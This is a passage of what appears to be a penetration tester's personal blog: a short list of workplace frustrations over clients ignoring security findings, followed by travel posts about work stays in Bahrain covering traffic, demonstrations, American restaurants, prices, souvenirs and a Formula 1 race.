You find access to a customer's Github.com site and your boss tells you to not explore the site and only report that you had access to login, since the site was not in scope.
You report a finding that you found last year for the same customer, and it allows you complete access to the server.
You find default access to a website that controls the customer's network switches, UPS, and other main pieces of their infrastructure, and the customer says he is not worried about it.
You find systems that are missing patches from 2004, and the customer tells you that it is not critical. You tell them to remove it from the network, and they tell you they need it for some other system that is important.
I am sure I will have more to come in the next few months, since my boss is stacking up assessments like they are going out of style, and we are still trying to hire a new pentester.

2nd Bahrain Trip

Well I had to go back to Bahrain to work for another 5 weeks; I was really not wanting to go, but I had already committed to the trip with the first 7 week trip that I did. Had a lot of stuff that needed me to be home, but luckily my wife was able to handle it in my absence.
The demonstrations were a lot lighter this trip, and I actually only saw a few burning tires (the burning remnants only). There were plenty of police and military vehicles everywhere, which might have been the reason for the fewer incidents.
Since I have already visited almost the entire Island, I did not venture out as much this trip. Went to the souq (open air market) only a few times just to see if anything new was being sold. Nothing really new, just the same stuff as before, I did pickup a few trinkets for the boys, and some jewelry for my wife.
I received a ticket to attend the Bahrain Formula 1 Grand Prix, which was an awesome event, it lasted 3 days. There were qualification runs the first two days, and some races by the smaller cars. Had some cars from the Formula Middle East, and Grand Prix 2 race a couple smaller runs. The last day was the actual race for the Formula 1, and it was followed up with a concert from Ne-yo. I would definitely recommend that if you are in Bahrain in April, this would be a must do.
My time flew this trip, and I am glad to be home. I will miss some of the friends that I have made while spending time over there, but I really started to miss the family.

Living in Bahrain for 50 days

Well I have been living in Bahrain for about 50 days now, and I am ready to head back to the United States. It is a little different living over here, most of the people are  very nice, many cannot drive let alone stay in any lane on the road. Many drivers like to honk their  horns; which can get a little annoying at times, especially when the light is just about to turn green and just incase you had not noticed that it was turning green they wanted to let you know by honking their horn. I have learned that if you can drive on it people will, no matter if it is the road or not, shoulders are almost like an extra lane for many people, even the dirt along the road can become an extension of the road for many people. I have seen a 3 lane road turn into a 5 lane road, with people all over the place, and as close to each other as possible with out hitting one another.
The dust in the air is awful at times, and my eyes have been red the entire time I have been here. My nose has been stopped up as well on several occasions. The weather has been fairly nice compared to Knoxville, Tennessee, where it has been snowing and raining.
Have not had too many problems finding something to eat; there are dozens of American restaurants here. There is even a street referred to as American Alley (next to the Navy base) and another called Shawarma Alley, due to the multiple (I believe 4) food stands located next to each other on the small road.
  • McDonald's
  • Hardee's
  • KFC
  • Pizza Hut
  • Papa John's
  • Burger King
  • Subway
  • Pollo Campero
  • Potbelly Sandwiches
  • Fatburger
  • Fuddruckers
  • Chili's
  • Bennigan's
  • Carrinos
  • Hard Rock Cafe
  • TGI Fridays
  • Gloria Jean's
  • Starbucks
  • Auntie Anne's
  • Baskin-Robbins
  • Cold Stone Creamery
There are probably places I am forgetting, but these are the ones I have seen and can remember at the present time. I was actually surprised at the number of American food places to eat at. Plus they all seem to have delivery, which is usually guys on motorcycles with a box attached to the back of the bike.
Delivery Guy

Chili's delivery driver. Would love to have this back home; getting chips and salsa delivered would be awesome.

There is a large police and military presence around town, and at times there are demonstrations.

Police and military parked along the road all over the place.


Small demonstration I ran into driving down the road one day. Police were shooting tear gas, demonstrators throwing rocks.

All in all it has been a decent trip; I have seen many interesting places and people, but it is time to head home. The prices are not any cheaper like many people told me they would be; in some cases they are the same or a little higher. It does seem to be cheaper due to the prices, but when 1 Dinar is equal to 2.5624 US Dollars, that 5 Dinar item is actually 13.26 USD. I can get a Big Mac combo meal (small drink and fries) for 1.500 BHD, which is $3.98 USD, a little cheaper than the US prices I believe, but the drink and fry sizes are smaller portions, which would make up the difference in price.
Purchasing local items can be fairly cheap, but anything that is shipped in from other countries is generally not cheaper. Purchasing Kraft cheese compared to local cheese is about double the price in some cases.
Many of the local shops (not grocery stores or food places) expect you to haggle with them over the prices of some items, so they will give you a high price when you ask. You have to know the value of the item beforehand to get a good price, which is not always easy to do. Places near the Navy base, or other expat areas, are generally going to try to get you to pay more than it is worth, because they know you will pay it.
Bahrain Snacks

Picked up some snacks to bring back with me: samboosa, mahtai, and some Fisthakiya.

Food For Matt


Picked up a few items for my oldest son, who is getting into cooking for his friends and himself. He can cook an Indian style meal for his friends to try.


Rugs

Picked up a few small rugs for family and friends as gifts. They were 3 BHD a piece, or about $8.00 USD; they are about 12′x12′ in size, and are all handmade locally.

Spent a lot of time traveling around to all of the shop areas and looking at all of the different items that are for sale; many are fakes of original items, or cheap knock-offs. Some items are cheap tourist items that they try to sell for a premium. There are many shops located all over the city, and they can be as small as a single room or as large as a full department store. You name it, you can probably find it here; not sure if it will be an original version of what you are looking for, but you can find at least a fake version of it.
I have picked up enough items to fill a full size suitcase, and had to purchase a small duffel bag to bring items back with me to the US. I am hoping I have not gone over my $800 limit of tax free items, or I will have to pay tax on anything over the amount. Will have to check my total count of money spent and make sure I am not over. Since I have a 7 hour layover in Amsterdam, I am sure I will find some more items there that I want to pick up for the family.
Well, getting ready to head home for a few weeks of relaxation and some normalcy, then back over here for another 35 days of fun.


50 days in Bahrain

My work is sending me to Bahrain for 50 days (90 total days) to work; my project will be split up into two parts. I will be onsite working for the first 50 days and then be back for the other 40 days to finish up working.
I plan on keeping a daily log of my events; not sure what access to the internet I will have, and what I should post while I am in country. I have heard that the country limits certain activities and websites from being viewed.
I have been following several news sites, and have signed up for the US Embassy feeds, along with continually watching the US Navy 5th Fleet site to see what is happening in country.
I have a nice long flight, starting on January 9th leaving McGhee Tyson heading to Detroit, with a 1:30 layover before heading to Amsterdam. Flying in Economy Plus, because my company is too cheap to get me Business class. The flight is supposed to be about 8 hours long, and then a 4 hour layover in Amsterdam before my 8 hour flight to Bahrain, with a stop in Abu Dhabi.